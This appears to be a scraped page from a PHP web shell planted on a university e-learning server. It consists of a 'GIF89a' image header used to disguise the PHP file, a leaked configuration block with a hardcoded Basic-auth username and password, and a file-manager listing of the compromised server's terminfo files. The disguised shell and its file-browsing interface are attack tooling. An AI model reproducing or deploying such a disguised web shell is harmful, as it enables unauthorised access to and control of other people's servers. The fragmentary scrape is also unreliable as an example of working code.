GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| rbcomm |
592 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rbcomm-nam |
588 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rbcomm-w |
588 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rca |
209 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rcons |
972 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rcons-color |
1.16 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rebus3180 |
738 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent |
365 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent100 |
490 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent20 |
394 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent200 |
728 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent25 |
404 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent40 |
500 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent40+ |
505 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| regent60 |
728 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rt6221 |
816 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rt6221-w |
820 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rtpc |
587 bytes |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt+pcfkeys |
1.03 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-16color |
2.26 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-256color |
2.23 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-88color |
2.20 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-color |
2.00 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-cygwin |
2.02 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-cygwin-native |
2.04 KB |
May 16 2023 18:45:27. |
0644 |
|
|
| rxvt-xpm |
2.00 KB |
May 16 2023 18:45:27. |
0644 |
|
|